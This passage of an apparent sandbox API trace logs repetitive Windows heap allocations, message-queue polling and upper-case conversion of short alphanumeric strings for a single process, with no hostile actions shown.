lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0156.490] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0156.490] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0156.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0156.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0156.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0156.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0156.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0156.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0156.491] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0156.491] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0156.492] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0156.492] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0156.492] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0156.493] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0156.493] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8d0 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0156.493] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0156.493] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0156.493] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0156.493] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0156.494] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0156.494] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0156.494] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74748 [0156.494] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0156.494] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0156.494] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.494] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0156.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0156.495] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0156.495] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0156.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0156.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0156.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0156.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0156.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0156.495] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74748 | out: hHeap=0x2af0000) returned 1 [0156.495] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0156.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0156.498] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0156.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0156.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0156.499] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0156.499] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa960 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0156.499] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0156.499] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0156.500] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0156.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0156.500] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.500] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0156.500] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0156.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0156.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0156.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0156.501] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0156.501] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 